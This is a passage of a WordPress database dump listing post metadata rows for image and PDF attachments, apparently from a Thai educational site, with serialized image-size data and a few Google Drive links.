;s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15340, 6481, '_edit_lock', '1578662397:11'),
(15341, 6481, '_edit_last', '11'),
(15342, 6481, '_cg_img_link', 'https://drive.google.com/file/d/1dTkbXgSh5kLsUpLyn1lfQu6uo38l6UOQ/view?usp=sharing'),
(15343, 6481, '_cg_link_target', ''),
(15344, 6482, '_wp_attached_file', '2020/01/button-2563-01.png'),
(15345, 6482, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:285;s:6:\"height\";i:95;s:4:\"file\";s:26:\"2020/01/button-2563-01.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"button-2563-01-150x95.png\";s:5:\"width\";i:150;s:6:\"height\";i:95;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15348, 6481, '_hide_featured', NULL),
(15353, 6486, '_edit_lock', '1578663102:11'),
(15354, 6486, '_edit_last', '11'),
(15355, 6486, '_cg_img_link', 'https://drive.google.com/file/d/1MWXp7TImBdYRuM-ZiWqkPH6cb0nfdAbi/view?usp=sharing'),
(15356, 6486, '_cg_link_target', ''),
(15359, 6486, '_hide_featured', NULL),
(15382, 6502, '_wp_attached_file', '2020/01/button-2563-12.png'),
(15383, 6502, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:815;s:6:\"height\";i:288;s:4:\"file\";s:26:\"2020/01/button-2563-12.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"button-2563-12-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"button-2563-12-300x106.png\";s:5:\"width\";i:300;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"button-2563-12-768x271.png\";s:5:\"width\";i:768;s:6:\"height\";i:271;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:26:\"button-2563-12-400x141.png\";s:5:\"width\";i:400;s:6:\"height\";i:141;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15384, 6503, '_wp_attached_file', '2020/01/button-2563-11.png'),
(15385, 6503, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:815;s:6:\"height\";i:288;s:4:\"file\";s:26:\"2020/01/button-2563-11.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"button-2563-11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"button-2563-11-300x106.png\";s:5:\"width\";i:300;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"button-2563-11-768x271.png\";s:5:\"width\";i:768;s:6:\"height\";i:271;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:26:\"button-2563-11-400x141.png\";s:5:\"width\";i:400;s:6:\"height\";i:141;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15386, 6507, '_wp_attached_file', '2019/12/20-01-11-12-28-21-947_deco.jpg'),
(15387, 6507, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:38:\"2019/12/20-01-11-12-28-21-947_deco.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"20-01-11-12-28-21-947_deco-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"20-01-11-12-28-21-947_deco-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"20-01-11-12-28-21-947_deco-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"20-01-11-12-28-21-947_deco-1024x628.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"20-01-11-12-28-21-947_deco-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"A1601\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15388, 6508, '_wp_attached_file', '2019/12/20-01-11-12-28-21-947_deco-1.jpg'),
(15389, 6508, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:40:\"2019/12/20-01-11-12-28-21-947_deco-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-1-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-1-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"20-01-11-12-28-21-947_deco-1-1024x628.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-1-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"A1601\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15390, 6509, '_wp_attached_file', '2019/12/20-01-11-12-28-21-947_deco-2.jpg'),
(15391, 6509, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:40:\"2019/12/20-01-11-12-28-21-947_deco-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-2-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-2-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"20-01-11-12-28-21-947_deco-2-1024x628.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-2-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"A1601\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15392, 6510, '_wp_attached_file', '2019/12/20-01-11-12-28-21-947_deco-3.jpg'),
(15393, 6510, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:40:\"2019/12/20-01-11-12-28-21-947_deco-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-3-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-3-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"20-01-11-12-28-21-947_deco-3-1024x628.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-3-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"A1601\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15394, 6511, '_wp_attached_file', '2019/12/20-01-11-12-28-21-947_deco-4.jpg'),
(15395, 6511, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:40:\"2019/12/20-01-11-12-28-21-947_deco-4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-4-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-4-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"20-01-11-12-28-21-947_deco-4-1024x628.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-4-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"A1601\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15396, 6512, '_wp_attached_file', '2019/12/20-01-11-12-28-21-947_deco-5.jpg'),
(15397, 6512, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:40:\"2019/12/20-01-11-12-28-21-947_deco-5.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-5-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-5-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"20-01-11-12-28-21-947_deco-5-1024x628.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-5-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"A1601\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15398, 6513, '_wp_attached_file', '2019/12/20-01-11-12-28-21-947_deco-6.jpg'),
(15399, 6513, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:40:\"2019/12/20-01-11-12-28-21-947_deco-6.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-6-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-6-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"20-01-11-12-28-21-947_deco-6-1024x628.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:40:\"20-01-11-12-28-21-947_deco-6-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"A1601\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15400, 6514, '_wp_attached_file', '2019/12/สำเร็จ-12-.png'),
(15401, 6514, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1098;s:6:\"height\";i:673;s:4:\"file\";s:34:\"2019/12/สำเร็จ-12-.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"สำเร็จ-12--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"สำเร็จ-12--300x184.png\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"สำเร็จ-12--768x471.png\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"สำเร็จ-12--1024x628.png\";s:5:\"width\";i:1024;s:6:\"height\";i:628;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"สำเร็จ-12--400x245.png\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15405, 6523, '_wp_attached_file', '2020/01/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf'),
(15406, 6522, '_edit_lock', '1579054662:14'),
(15407, 6522, '_edit_last', '14'),
(15408, 6522, '_hide_featured', NULL),
(15409, 6531, '_edit_lock', '1579254129:14'),
(15410, 6531, '_edit_last', '14'),
(15411, 6532, '_wp_attached_file', '2020/01/94704.jpg'),
(15412, 6532, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:640;s:6:\"height\";i:1280;s:4:\"file\";s:17:\"2020/01/94704.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"94704-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"94704-150x300.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"94704-512x1024.jpg\";s:5:\"width\";i:512;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"94704-150x300.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15413, 6531, '_hide_featured', NULL),
(15414, 6535, '_wp_attached_file', '2020/01/1137843.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(15415, 6535, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:720;s:4:\"file\";s:19:\"2020/01/1137843.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"1137843-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"1137843-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"1137843-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15416, 6536, '_wp_attached_file', '2020/01/855165.jpg'),
(15417, 6536, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:848;s:4:\"file\";s:18:\"2020/01/855165.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"855165-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"855165-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"855165-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"855165-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"855165-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15418, 6537, '_wp_attached_file', '2020/01/855164.jpg'),
(15419, 6537, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:848;s:4:\"file\";s:18:\"2020/01/855164.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"855164-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"855164-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"855164-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"855164-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"855164-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15420, 6538, '_wp_attached_file', '2020/01/94705.jpg'),
(15421, 6538, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:905;s:6:\"height\";i:1280;s:4:\"file\";s:17:\"2020/01/94705.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"94705-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"94705-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"94705-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"94705-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"94705-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15422, 6541, '_wp_attached_file', '2019/12/เลื่อนเวลา.png'),
